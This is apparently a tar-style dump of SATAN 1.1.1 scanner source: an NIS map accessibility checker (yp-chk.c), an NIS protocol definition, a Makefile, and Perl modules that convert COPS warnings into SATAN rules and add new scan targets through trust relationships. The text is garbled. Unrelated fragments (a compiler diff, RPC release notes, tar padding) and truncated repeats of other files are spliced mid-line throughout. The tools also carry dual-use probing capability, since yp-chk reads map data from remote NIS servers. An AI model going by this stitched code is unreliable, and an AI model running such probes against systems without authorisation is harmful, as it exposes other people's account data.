..if(o==CAST && mt1==0)return(TYPL+TYMATCH); ..if( mt12 & MDBI ) return( TYPL+LVAL+TYMATCH ); ..else if( (mt1&MENU)||(mt2&MENU) ) return( LVAL+NCVT+TYPL+PTMATCH+PUN ); ! ..else if( mt12 == 0 ) break; ..else if( mt1 & MPTR ) return( LVAL+PTMATCH+PUN ); ..else if( mt12 & MPTI ) return( TYPL+LVAL+TYMATCH+PUN ); ..break; --- 1261,1269 ---- ..if(o==CAST && mt1==0)return(TYPL+TYMATCH); ..if( mt12 & MDBI ) return( TYPL+LVAL+TYMATCH ); ..else if( (mt1&MENU)||(mt2&MENU) ) return( LVAL+NCVT+TYPL+PTMATCH+PUN ); ! ../* if right is TVOID and looks like a CALL, is not ok */ ! ..else if (mt2 == 0 && (p->in.right->in.op == CALL || p->in.right->in.op == UNARY CALL)) ! ...break; ..else if( mt1 & MPTR ) return( LVAL+PTMATCH+PUN ); ..else if( mt12 & MPTI ) return( TYPL+LVAL+TYMATCH+PUN ); ..break; WHAT'S NEW IN THIS RELEASE: RPCSRC 4.0 The previous release was RPCSRC 3.9. As with all previous releases, this release is based directly on files from Sun Microsystem's implementation. Upgrade from RPCSRC 3.9 1) RPCSRC 4.0 upgrades RPCSRC 3.9. Improvements from SunOS 4.0 have been integrated into this release. Secure RPC (in the secure_rpc/ directory) 2) DES Authentication routines and programs are provided. 3) A new manual, "Secure NFS" is provided, which describes Secure RPC and Secure NFS. 4) Skeleton routines and manual pages are provided which describe the DES encryption procedures required by Secure RPC. HOWEVER, NO DES ROUTINE IS PROVIDED. New Functionality 5) rpcinfo can now be used to de-register services from the portmapper which may have terminated abnormally. 6) A new client, rstat, is provided which queries the rstat_svc and prints a status line similar to the one displayed by "uptime". rinted by "uptime". The documentation is not built during the "make install" command. Typing "make" in the doc directory will cause all of the manuals to be formatted using nroff into a single file. We have had a report that certain "troff" equivalentssatan-1.1.1/src/yp-chk/............................................................................. 700 . 465 . 506 . 0 5742521557 7600. ..................................................................... ................................................................................................................................................................................................................................................................. ..............................satan-1.1.1/src/yp-chk/Makefile..................................................................... 600 . 465 . 506 . 620 5741523062 11275. ....................................................................... ................................................................................................................................................................................................................................................................. ............................SHELL.= /bin/sh BIN.= ../../bin OBJECTS.= yp-chk.o yp_clnt.o yp_xdr.o MAKES.= yp.h yp_clnt.c yp_svc.c yp_xdr.c PROG.= $(BIN)/yp-chk CFLAGS.= -O -I. $(XFLAGS) XFLAGS.= -DAUTH_GID_T=int RPCGEN.= rpcgen #LIBS.= -lsocket -lnsl $(PROG):$(OBJECTS) .$(CC) $(CFLAGS) -o $@ $(OBJECTS) $(LIBS) yp.h yp_clnt.c yp_xdr.c: yp.x .$(RPCGEN) $? 2>/dev/null clean: .rm -f $(PROG) *.o core $(MAKES) yp-chk.o: yp.h (to mip/trees.c): *** trees.c.r1.1.Mon May 11 13:47:58 1987 --- trees.c.r1.2.Wed Jul 2 18:28:52 1986 *********satan-1.1.1/src/yp-chk/yp.x......................................................................... 600 . 465 . 506 . 14231 5737275724 10537. ............................................................................................ ................................................................................................................................................................................................................................................................. ......./* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* * Protocol description file for the Yellow Pages Service */ #ifndef RPC_HDR %#ifndef lint %/*static char sccsid[] = "from: @(#)YP.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: YP.x,v 1.1 1994/08/04 19:01:55 wollman Exp $"; %#endif /* not lint */ #endif const YPMAXRECORD = 1024; const YPMAXDOMAIN = 64; const YPMAXMAP = 64; const YPMAXPEER = 64; enum YPstat { .YP_TRUE..= 1, .YP_NOMORE.= 2, .YP_FALSE.= 0, .YP_NOMAP.= -1, .YP_NODOM.= -2, .YP_NOKEY.= -3, .YP_BADOP.= -4, .YP_BADDB.= -5, .YP_YPERR.= -6, .YP_BADARGS.= -7, .YP_VERS..= -8 }; enum YPxfrstat { .YPXFR_SUCC.= 1, .YPXFR_AGE.= 2, .YPXFR_NOMAP.= -1, .YPXFR_NODOM.= -2, .YPXFR_RSRC.= -3, .YPXFR_RPC.= -4, .YPXFR_MADDR.= -5, .YPXFR_YPERR.= -6, .YPXFR_BADARGS.= -7, .YPXFR_DBM.= -8, .YPXFR_FILE.= -9, .YPXFR_SKEW.= -10, .YPXFR_CLEAR.= -11, .YPXFR_FORCE.= -12, .YPXFR_XFRERR.= -13, .YPXFR_REFUSED.= -14 }; typedef string domainname<YPMAXDOMAIN>; typedef string mapname<YPMAXMAP>; typedef string peername<YPMAXPEER>; typedef opaque keydat<YPMAXRECORD>; typedef opaque valdat<YPMAXRECORD>; struct YPmap_parms { .domainname domain;. .mapname map; .unsigned int ordernum; .peername peer; }; struct YPreq_key { .domainname domain; .mapname map; .keydat key; }; struct YPreq_nokey { .domainname domain;. .mapname map; }; . struct YPreq_xfr { .YPmap_parms map_parms; .unsigned int transid; .unsigned int prog; .unsigned int port; }; struct YPresp_val { .YPstat stat; .valdat val; }; struct YPresp_key_val { .YPstat stat; .keydat key; .valdat val; }; struct YPresp_master { .YPstat stat;. .peername peer; }; struct YPresp_order { .YPstat stat; .unsigned int ordernum; }; union YPresp_all switch (bool more) { case TRUE: .YPresp_key_val val; case FALSE: .void; }; struct YPresp_xfr { .unsigned int transid; .YPxfrstat xfrstat; }; struct YPmaplist { .mapname map; .YPmaplist *next; }; struct YPresp_maplist { .YPstat stat; .YPmaplist *maps; }; enum YPpush_status { .YPPUSH_SUCC.= 1,./* Success */ .YPPUSH_AGE .= 2,./* Master's version not newer */ .YPPUSH_NOMAP.= -1,./* Can't find server for map */ .YPPUSH_NODOM.= -2,./* Domain not supported */ .YPPUSH_RSRC.= -3,./* Local resource alloc failure */ .YPPUSH_RPC.= -4,./* RPC failure talking to server */ .YPPUSH_MADDR .= -5,./* Can't get master address */ .YPPUSH_YPERR.= -6,./* YP server/map db error */ .YPPUSH_BADARGS.= -7,./* Request arguments bad */ .YPPUSH_DBM.= -8,./* Local dbm operation failed */ .YPPUSH_FILE.= -9,./* Local file I/O operation failed */ .YPPUSH_SKEW.= -10,./* Map version skew during transfer */ .YPPUSH_CLEAR.= -11,./* Can't send "Clear" req to local YPserv */ .YPPUSH_FORCE.= -12,./* No local order number in map use -f flag. */ .YPPUSH_XFRERR .= -13,./* YPxfr error */ .YPPUSH_REFUSED.= -14 ./* Transfer request refused by YPserv */ }; struct YPpushresp_xfr { .unsigned transid; .YPpush_status status; }; /* * Response structure and overall result status codes. Success and failure * represent two separate response message types. */ enum YPbind_resptype { .YPBIND_SUCC_VAL = 1, .YPBIND_FAIL_VAL = 2 }; struct YPbind_binding { opaque YPbind_binding_addr[4]; /* In network order */ opaque YPbind_binding_port[2]; /* In network order */ }; union YPbind_resp switch (YPbind_resptype YPbind_status) { case YPBIND_FAIL_VAL: unsigned YPbind_error; case YPBIND_SUCC_VAL: YPbind_binding YPbind_bindinfo; }; /* Detailed failure reason codes for response field YPbind_error*/ const YPBIND_ERR_ERR = 1;./* Internal error */ const YPBIND_ERR_NOSERV = 2;./* No bound server for passed domain */ const YPBIND_ERR_RESC = 3;./* System resource allocation failure */ /* * Request data structure for YPbind "Set domain" procedure. */ struct YPbind_setdom { .domainname YPsetdom_domain; .YPbind_binding YPsetdom_binding; .unsigned YPsetdom_vers; }; /* * YP access protocol */ program YPPROG { .version YPVERS { ..void ..YPPROC_NULL(void) = 0; ..bool ..YPPROC_DOMAIN(domainname) = 1;. ..bool ..YPPROC_DOMAIN_NONACK(domainname) = 2; ..YPresp_val ..YPPROC_MATCH(YPreq_key) = 3; ..YPresp_key_val ..YPPROC_FIRST(YPreq_key) = 4; ..YPresp_key_val ..YPPROC_NEXT(YPreq_key) = 5; ..YPresp_xfr ..YPPROC_XFR(YPreq_xfr) = 6; ..void ..YPPROC_CLEAR(void) = 7; ..YPresp_all ..YPPROC_ALL(YPreq_nokey) = 8; ..YPresp_master ..YPPROC_MASTER(YPreq_nokey) = 9; ..YPresp_order ..YPPROC_ORDER(YPreq_nokey) = 10; ..YPresp_maplist ..YPPROC_MAPLIST(domainname) = 11; .} = 2; } = 100004; /* * YPPUSHPROC_XFRRESP is the callback routine for result of YPPROC_XFR */ program YPPUSH_XFRRESPPROG { .version YPPUSH_XFRRESPVERS { ..void ..YPPUSHPROC_NULL(void) = 0; ..YPpushresp_xfr. ..YPPUSHPROC_XFRRESP(void) = 1; .} = 1; } = 0x40000000;./* transient: could be anything up to 0x5fffffff */ /* * YP binding protocol */ program YPBINDPROG { .version YPBINDVERS { ..void ..YPBINDPROC_NULL(void) = 0; . ..YPbind_resp ..YPBINDPROC_DOMAIN(domainname) = 1; ..void ..YPBINDPROC_SETDOM(YPbind_setdom) = 2; .} = 2; } = 100007; stat; .valdat val; }; struct YPresp_key_val { .YPstat stat; .keydat key; .valdat val; }; struct YPresp_master { .YPstat stat;. .peername peer; }; struct YPresp_order { .YPstat stat; .unsigned int ordernum; }; union YPresp_all switch (bool more) { case TRUE: .YPresp_key_val val; case FALSE: .void; }; struct YPresp_xfr { .unsigned int transid; .YPxfrstsatan-1.1.1/src/yp-chk/yp-chk.c..................................................................... 600 . 465 . 506 . 10720 5740245235 11240. ............................................................................................. ................................................................................................................................................................................................................................................................. ...... /* * Simple NIS map accessibility checker. Prints the first record when it * succeeds. * * Author: Wietse Venema. */ #define PORTMAP #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> #include <rpc/rpc.h> #ifndef INADDR_NONE #define INADDR_NONE (-1)../* XXX should be 0xffffffff */ #endif extern int getopt(); extern int optind; extern char *optarg; #include "yp.h" static struct timeval timeout = {5, 0}; static int verbose = 0; static char *progname; #define debug if (verbose) printf static void usage() { fprintf(stderr, "usage: %s domain map server\n", progname); exit(0); } /* perrorexit - print error and exit */ static void perrorexit(text) char *text; { perror(text); exit(1); } /* make_tcp_client - create client handle to talk to rpc server */ static CLIENT *make_tcp_client(addr, program, version) struct sockaddr_in *addr; u_long program; u_long version; { int sock; debug("Trying to set up TCP client handle\n"); addr->sin_port = 0; sock = RPC_ANYSOCK; return (clnttcp_create(addr, program, version, &sock, 0, 0)); } /* make_udp_client - create client handle to talk to rpc server */ static CLIENT *make_udp_client(addr, program, version) struct sockaddr_in *addr; u_long program; u_long version; { int sock; debug("Trying to set up UDP client handle\n"); addr->sin_port = 0; sock = RPC_ANYSOCK; return (clntudp_create(addr, program, version, timeout, &sock)); } /* find_host - look up host information */ static int find_host(sin, host) char *host; struct sockaddr_in *sin; { struct hostent *hp; /* * Look up IP address information. XXX with multi-homed hosts, should try * all addresses until we succeed. */ memset((char *) sin, 0, sizeof(*sin)); sin->sin_family = AF_INET; debug("Looking up host %s\n", host); if ((sin->sin_addr.s_addr = inet_addr(host)) != INADDR_NONE) { .return (1); } else if ((hp = gethostbyname(host)) == 0 || hp->h_addrtype != AF_INET) { .return (0); } else { .memcpy((char *) &sin->sin_addr, hp->h_addr, sizeof(sin->sin_addr)); .return (1); } } /* try_map - transfer first map entry */ static int try_map(client, domain, map) CLIENT *client; char *domain; char *map; { struct YPreq_nokey nokey; struct YPresp_key_val key_val; char keybuf[1024]; char valbuf[1024]; enum clnt_stat status; nokey.domain = domain; nokey.map = map; key_val.key.keydat_val = keybuf; key_val.key.keydat_len = sizeof(keybuf); key_val.val.valdat_val = valbuf; key_val.val.valdat_len = sizeof(valbuf); /* * Look up the first entry. Sending the call may fail. */ debug("Trying: %s %s\n", domain, map); if ((status = clnt_call(client, YPPROC_FIRST, xdr_YPreq_nokey, ... (char *) &nokey, xdr_YPresp_key_val, ... (char *) &key_val, timeout)) != RPC_SUCCESS) { .clnt_perrno(status); .return (0); } /* * The call itself may fail (wrong domain or map). */ if (key_val.stat != YP_TRUE) { .fprintf(stderr, "%s: domain %s map %s: failed\n", ..progname, domain, map); .exit(1); } /* * Show just one entry as proof. */ printf("%.*s\n", key_val.key.keydat_len, key_val.key.keydat_val); return (1); } main(argc, argv) int argc; char **argv; { struct sockaddr_in sin; CLIENT *client; char *domain; char *map; char *host; int success = 0; int opt; progname = argv[0]; /* * Parse JCL. */ while ((opt = getopt(argc, argv, "vt:")) != EOF) { .switch (opt) { .case 'v':..../* turn on verbose mode */ . verbose = 1; . break; .case 't':..../* change timeout */ . timeout.tv_sec = atoi(optarg); . break; .default: . usage(); . /* NOTREACHED */ .} } if (argc != optind + 3) .usage(); domain = argv[optind]; map = argv[optind + 1]; host = argv[optind + 2]; if (find_host(&sin, host) == 0) { .fprintf(stderr, "%s: unknown host: %s\n", progname, host); .exit(1); } /* * Now try each transport until we succeed. */ if ((client = make_tcp_client(&sin, YPPROG, YPVERS)) == 0 .|| (success = try_map(client, domain, map)) == 0) .if ((client = make_udp_client(&sin, YPPROG, YPVERS)) != 0) . success = try_map(client, domain, map); exit(success == 0); } */ ! #define TNULL.INCREF(MOETY)./* pointer to Msatan-1.1.1/perl/................................................................................... 700 . 465 . 506 . 0 5742521562 6554. ........................................................ ................................................................................................................................................................................................................................................................. ...........................................satan-1.1.1/perl/config.pl.......................................................................... 600 . 465 . 506 . 2757 5742457003 10456. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# # rewrite satan.cf after the user changes it. # # suck in the changes, then just cycle through each line of the .cf file. # if there is a match, put the new value in there. # sub write_config_file { local($new_values) = @_; local(%new_values, $variable, $old_variable, $old_value); # # split the strings into something easier to handle for ( split(/\n/, $new_values) ) { .next if !$_; .($variable, $value) = split(/=/, $_); .# need to stick a dollar sign in front of var .$variable = "\$" . "$variable"; .# and quotes around non-numbers .if ($value !~ /^\d+$/) { $value = "\"$value\""; } .$new_values{$variable} = $value; .} # # open the config and the scratch file # die "Can't read $SATAN_CF file!\n" unless open(CF, "$SATAN_CF"); die "Can't write $SATAN_CF.new file!\n" unless open(CFN, ">$SATAN_CF.new"); while (<CF>) { .# punt if the going gets too tough... .if (!/^\$/) { ..print CFN $_; ..next; ..} . .chop; .($old_variable, $old_value) = split(/=\s+/, $_); .# kill spaces and semicolons .$old_variable =~ s/\s//g; .$old_value =~ s/;//g; .# suck in the lines, compare them to each of the vars gotten from user .for $variable (keys %new_values) { ..if ($variable eq $old_variable) { ...$old_value = $new_values{$variable}; ...} ..} .print "CF: $_ ($old_variable, $old_value)\n"; .print CFN "$old_variable = $old_value;\n"; .} close(CF); close(CFN); # move the evidence to where it belongs... old to .old, new to .cf: system("mv $SATAN_CF $SATAN_CF.old"); system("mv $SATAN_CF.new $SATAN_CF"); } 1; g up host %s\n", satan-1.1.1/perl/cops2satan.pl...................................................................... 700 . 465 . 506 . 12672 5742457003 11304. .................................................................................... ................................................................................................................................................................................................................................................................. ...............#!/usr/local/bin/perl5 # # An experimental script that will Convert a COPS warning report # into SATAN rules. Take stdin or a filename. Uses the function # "satan_print" to emit SATAN rules. # require "perl/hostname.pl"; require "perl/misc.pl"; # we're the target... nothing remote here $target = &hostname(); # # default value for satan_print(); everything we report is "available" $status = "a"; # most things only affect users on the machine $trusted = "ANY@$target"; # most things will be blank here, at least on my first shot at this... $service_ouput = ""; # ok, process everything now: while (<>) { .# chow down on blank lines .if ($_ =~ /^\s*$/) { next; } .# top three lines look like: .# .# ATTENTION .# Security Report for... .# from host ... .if ($_ =~ /from host/) { $start_processing = 1; next; } .if (!$start_processing) { next; } .# get the service, if possible -- .# assumes all checks print out something like: .# "**** foo.chk ****" .# when the verbose flag is true .if ($_ =~ /^\*\*\*\*/) { ..($service) = ($_ =~ /\*\*\*\* (\S+) /); ..next; ..} . .# IMPORTANT - exception list! .# .# Be very careful of regular expressions and other meta stuff... .# ()'s, *'s, ?'s, /'s, etc. are all trouble. Backquote if in doubt. .# .# Sample list: .# .# Hassled by mail warning? .# next if (m@Warning! /usr/spool/mail is _World_ writable!@); .# .# Running an NIS-free machine but in an NIS environment? .# next if (/YG/); .# next if (/YP/); .# if it doesn't start with "Warning!", then nuke the second .# line; it's a multipart print .next unless ($_ =~ /^Warning!/); . .# .# START THE CHECKING .# .# level 0 checks -- the most serious .# .if ($_ =~ /A "+" entry in/) { ..$severity = "us"; ..$trusted = "ANY@ANY"; ..$trustee = "ANY@$target"; ..$text = "+ in /etc/hosts.equiv file"; ..} .. .# Assume bugs are all bad -- some bugs are remote; need to .# change this to recognize them... .elsif (m@ould have a hole/bug@) { ..$severity = "rs"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$text = "serious bug"; ..} .# kuang telling us we're in deep yoghurt, or something like that... .elsif ($_ =~ /DO ANYTHING/) { ..$severity = "rs"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$text = "kuang found a path to compromise root"; ..} .# writable password file really sucks: .elsif ($_ =~ /\/etc\/passwd.*_World_/) { ..$severity = "rs"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$text = "world-writable password file"; ..} .# this is easy root most of the time... .elsif ($_ =~ /Directory.*is _World_ writable and in roots path!/) { ..$severity = "rs"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$text = "world-writable file in root's path"; ..} .# level 1 checks: .# .elsif ($_ =~ /uudecode is suid!/) { ..$severity = "uw";.# cops should tell us *what* user, eh? ..$trusted = "ANY@$target"; ..$trustee = "user@$target"; ..$text = "uudecode is suid"; ..} .elsif ($_ =~ /rexd is enabled in/) { ..$severity = "us"; ..$trusted = "ANY@ANY"; ..$trustee = "user@$target"; ..$text = "rexd is enabled"; ..} .elsif ($_ =~ /User.*mode/ && $_ !~ /is not a directory/) { ..$severity = "us"; ..$trusted = "ANY@$target"; ..$trustee = "user@$target"; ..$text = "User home directory or startup file is writable"; ..} .elsif ($_ =~ /tftp is enabled on/) { ..$severity="nr"; ..$trustee="nobody@$target"; ..$trusted="ANY@ANY"; ..$text="tftp is enabled"; ..$text = "tftp is enabled on"; ..&satan_print(); ..# (OUTPUT TWICE) ..$severity="nw"; ..$trustee="nobody@$target"; ..$trusted="ANY@ANY"; ..$text = "tftp is enabled on"; ..} .elsif ($_ =~ /uudecode is enabled in/) { ..$severity = "nw"; ..$trustee="nobody@$target"; ..$trusted="ANY@ANY"; ..$text = "uudecode is enabled in/"; ..} .# unclear what ramifications are... .# /Password file, line.*is blank/ .# /Password file, line.*nonnumeric user id:/ .elsif ($_ =~ /(in cron_file) is World writable!/) { ..$severity = "root"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$status = "q"; # who knows if it really matters? ..$text = "File in cron_file is world writable"; ..} .elsif ($_ =~ /File.*(inside root executed file) is _World_ writable!/) { ..$severity = "root"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$status = "q"; # who knows if it really matters? ..$text = "File inside root executed file is _World_ writable!"; ..} .elsif ($_ =~ /File.*(in .*) is _World_ writable!/) { ..$severity = "user"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$status = "q"; # who knows if it really matters? ..$text = "File inside important command is _World_ writable!"; ..} .# this assumes anon-ftp is actually on! .elsif ($_ =~ /ftp's home directory should not be/) { ..$severity = "nw"; ..$trusted = "ANY@ANY"; ..$trustee = "nobody@$target"; ..$text = "ftp's home directory is /"; ..&satan_print(); ..# (OUTPUT TWICE) ..$severity = "nr"; ..$trusted = "ANY@ANY"; ..$trustee = "nobody@$target"; ..$text = "ftp's home directory is /"; ..} .# this gives away password file; what do we do? .# elsif (/and.*ass.*are the same/) .# $text = "system password file and ~ftp/etc/passwd are the same"; .# unclear of ramifications; could be very bad or ok .# elsif (/should be mode 555/) .# rhosts entry in ftp... .# elsif (/should be be empty/) . .# PRINT *SOMETHING* if can't find anything... give it no .# severity so it won't get counted... .else { ..$severity = ""; ..$trusted = ""; ..$trustee = ""; ..$status = "a"; ..($text) = /Warning!\s+(.+)$/; ..# $text = "Unknown warning!"; ..} .&satan_print(); .} ); .# if it doesn't start with "Warning!", then nuke the second .# lisatan-1.1.1/perl/domains.pl......................................................................... 600 . 465 . 506 . 4530 5742457003 10632. ................................................................................................ ................................................................................................................................................................................................................................................................. ...# # sift by domains # # Output to: # # $all_domains{domain}: hosts in this domain # # host_domain{host}: the domain of this host # # $domain_count{domain}: number of hosts in this domain # # $domain_severities{domain}: nr of vulnerable hosts in domain # # $domain_flag: reset whenever the tables are updated. To recalculate, # invoke make_domain_info(). # # Standalone usage: perl domains.pl [data directory] # # # Generate domain statistics. # sub make_domain_info { local($domain, $host); if ($domain_flag > 0) { .return; } $domain_flag = time(); print "Rebuild domain type statistics...\n" if $debug; %all_domains = (); for $host (keys %all_hosts) { .if ($host =~ /^[\[\]0-9.]+$/) { . $domain = "unknown"; .} else { . ($domain = $host) =~ s/^[^.]+\.//; .} .$all_domains{$domain} .= "$host "; .$host_domain{$host} = $domain; } # Cheat, in case the facts file has names not in all-hosts. for $host (keys %hosttype, keys %severity_host_count) { .if ($host =~ /^[0-9.]+$/) { . $domain = "unknown"; .} else { . ($domain = $host) =~ s/^[^.]+\.//; .} .if (!exists($host_domain{$host})) { . $all_domains{$domain} .= "$host "; . $host_domain{$host} = $domain; .} } for $domain (keys %all_domains) { .$domain_count{$domain} = split(/\s+/, $all_domains{$domain}); .$domain_severities{$domain} = 0; .for $host (split(/\s+/, $all_domains{$domain})) { . $domain_severities{$domain}++ if exists($severity_host_type_info{$host}); .} } } # # erase the domain info tables # sub clear_domain_info { %all_domains = (); %host_domain = (); %domain_count = (); %domain_severities = (); $domain_flag = 0; } # # Stand-alone mode # if ($running_under_satan == 0) { warn "domains.pl in stand-alone mode..."; $running_under_satan = 1; $debug = 1; require 'perl/targets.pl'; require 'perl/severities.pl'; require 'perl/facts.pl'; &read_all_hosts("$ARGV[0]/all-hosts"); &read_facts("$ARGV[0]/facts"); &make_domain_info(); &make_hosttype_info(); print "Missing domain info\n"; for (keys %hosttype) { .print "\t$_\n" if !exists($host_domain{$_}); } print "\nDomain info\n"; for (keys %all_domains) { . print "Domain: $_ $domain_severities{$_}/$domain_count{$_}\n"; . for (split(/\s/, $all_domains{$_})) { .. print "\t$_\n"; . } } } 1; abled"; ..$text = "tftp is enabled on"; ..&satan_print(); ..# (OUTPUT TWICE) ..$severity="nw"; ..$trustee="nobody@$target"; ..$trusted="ANY@ANY"; ..$text = "tftp is enasatan-1.1.1/perl/drop_fact.pl....................................................................... 600 . 465 . 506 . 2724 5742457003 11144. ............................................................................... ................................................................................................................................................................................................................................................................. ....................# # Usage: $code = &drop_fact() # # Applies the rules in $drop_fact_files to the global $target..$text # variables. The result value is nonzero if the record should be ignored. # # Standalone usage: perl drop_fact.pl [satan_record_files...] # $drop_fact_files = "rules/drop"; sub build_drop_fact{ local($files) = @_; local($code); $code = "sub drop_fact {\n"; foreach $file (split(/\s+/, $files)) { .open(RULES, $file) || die "cannot open $file: $!"; .while (<RULES>) { . chop; . while (/\\$/) { ..chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . next if /^\s*$/; . s/@/\\@/g; . $code .= "\tif ($_) {\n\t\treturn 1;\n\t}\n"; .} .close(RULES); } $code .= "\treturn 0;\n}\n"; return $code; } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_drop_fact($drop_fact_files); die "error in $drop_fact_files: $@" if $@; } else { $running_under_satan = -1; require 'perl/misc.pl'; # # Build satan rules and include them into the running code. # $code = &build_drop_fact($drop_fact_files); print "Code generated from $drop_fact_files file:\n\n"; print $code; eval $code; die "error in $drop_fact_files: $@" if $@; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { .chop; .if (&satan_split($_)) { . warn "Ill-formed fact: $_\n"; .} elsif (&drop_fact()) { . print "Dropped: $_\n"; .} } } 1; ); .} } } # # erase the domain info tabsatan-1.1.1/perl/facts.pl........................................................................... 600 . 465 . 506 . 11024 5742457003 10314. .......................................................................... ................................................................................................................................................................................................................................................................. .........................# # add_fact($record) add one record to the new facts list. # # process_facts() iterates over all new facts and generates new facts or # new todo items. It keeps looping until the new facts list becomes empty. # # save_facts($path) saves the old facts to the named file. # # read_facts($path) reads the old facts from the named file. # # merge_facts($path) merge with i-core tables. # # redo_old_facts() re-applies the todo/fact rules in case the probe # level or rule base have changed (or we would never see any effect # of changing todo/fact rules with already collected data). # # drop_old_facts() forgets all old facts we have about a host. # # Warning: all facts processing that invokes inference engines MUST set $_. # # version 1, Sun Mar 19 9:48:44 1995, last mod by zen # # # Add one fact to the new facts list, with duplicate suppression. # sub add_fact { .local($fact) = @_; .if (!exists($old_facts{$fact}) && !&drop_fact($fact) && !exists($new_facts{$fact})) { ..$new_facts{$fact} = 1; ..print "Add-fact: $fact\n" if $debug; .} } # # Iterate over the new facts list until nothing new shows up. # sub process_facts { .local(%temp_facts); .while(&sizeof(*new_facts) > 0) { ..%temp_facts = %new_facts; ..%new_facts = (); ..for (keys %temp_facts) { ...if (&satan_split($_)) { ....warn "Ill-formatted fact: $_\n"; ....next; ...} ...$old_facts{$_} = 1; ...if ($status ne "u") { ....# ....# Stage 1: update the per-host tables. ....# ....&infer_hosttype($_); ....&infer_services($_); ....&update_severities($_); ....&update_trust($_); ....# ....# Stage 2: generate new probes and derive ....# new facts, using all information that ....# has been collected sofar. Derive new ....# targets from trust relationships ....# (ignore localhost). ....# ....&infer_todo($_); ....&infer_facts($_); ....if (($trusted =~ /([^@]+)$/) && ($1 ne "ANY") .... && ($1 !~ /^localhost\.?/i)) { .....&new_target(&fix_hostname($1, $target), ......&get_proximity($target) + 1); ....} ...} ..} .} } # # Save facts to named file. # sub save_facts { .local($path) = @_; .open(FACTS, ">$path") || die "cannot save facts to $path: $!"; .for (keys %old_facts) { ..print FACTS "$_\n"; .} .close(FACTS); } # # Reset facts tables and derivatives # sub clear_facts { .%old_facts = (); .%new_facts = (); .&clear_hosttype_info(); .&clear_service_info(); .&clear_severity_info(); .&clear_trust_info(); } # # Load facts from named file. # sub read_facts { .local($path) = @_; .&clear_facts(); .&merge_facts($path); } # # Merge facts with in-core tables. # sub merge_facts { .local($path) = @_; .open(FACTS, $path) || die "Cannot read facts file $path: $!"; .print "Reading facts from $path...\n" if $debug; .while (<FACTS>) { ..chop; ..if (!exists($old_facts{$_})) { ...if (&satan_split($_)) { ....warn "Warning - corrupted $path record: $_\n"; ....next; ...} ...$old_facts{$_} = 1; ...if ($status ne "u") { ....&infer_hosttype($_); ....&infer_services($_); ....&update_severities($_); ....&update_trust($_); ....&infer_facts($_); ...} ..} .} .&process_facts(); .close(FACTS); } # # Forget all old facts we have on a specific host. # sub drop_old_facts { .local($host) = @_; .local($fact, $target); .for $fact (keys %old_facts) { ..($target) = split(/\|/, $fact); ..if ($target eq $host) { ...print "Deleting: $fact\n" if $debug; ...delete $old_facts{$fact}; ..} .} } # # Re-apply todo/fact rules in case attack level or rule base has changed. # sub redo_old_facts { .for (keys %old_facts) { ..&satan_split($_); ..&infer_todo($_); ..&infer_facts($_); .} .&process_facts(); } # # Some scaffolding code for stand-alone testing. # if ($running_under_satan) { .require 'perl/misc.pl'; .require 'perl/fix_hostname.pl'; .require 'perl/infer_todo.pl'; .require 'perl/infer_facts.pl'; .require 'perl/drop_fact.pl'; .require 'perl/hosttype.pl'; .require 'perl/services.pl'; .require 'perl/severities.pl'; .require 'perl/trust.pl'; } else { .$running_under_satan = -1; .$debug = 1; .require 'perl/misc.pl'; .require 'perl/fix_hostname.pl'; .require 'perl/infer_todo.pl'; .require 'perl/infer_facts.pl'; .require 'perl/drop_fact.pl'; .require 'perl/hosttype.pl'; .require 'perl/services.pl'; .require 'perl/severities.pl'; .require 'perl/trust.pl'; .warn "facts.pl running in stand-alone mode\n"; .eval "sub add_todo { local(\$target,\$tool,\$args) = \@_; ..print \"add_todo: \$target,\$tool,\$args\\n\"; }\n"; .eval "sub new_target { local(\$new,\$old) = \@_; ..print \"new_target: \$new,\$old\\n\"; }\n"; .print "Adding new facts...\n"; .while (<>) { ..chop; ..&add_fact($_); .} .print "Processing new facts...\n"; .&process_facts(); } 1; ($_ =~ /uudecode is enabled in/) { ..$severity = "nw"; ..$trustee="nobody@$target"; ..$trusted="ANY@ANY"; ..$text = "uudecode is enabled in/"; ..} .# unclear what ramifications are... .# /Password file, line.*is blank/ .# /Password file, line.*nonnumeric user id:/ .elsif ($_ =~ /(in cron_file) is World writable!/) { ..$severity = "root"; ..$trusted = "ANY@$target"; ..$trustee = "root@$target"; ..$status = "q"; # who knows if it really matters? ..$text = "File in cron_file is world writasatan-1.1.1/perl/fix_hostname.pl.................................................................... 600 . 465 . 506 . 3721 5742457003 11665. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# fix possibly unqualified or truncated hostname, given the fqdn of the # host that we got the information from. # sub fix_hostname { local ($host, $origin) = @_; local ($fqdn, $dot, 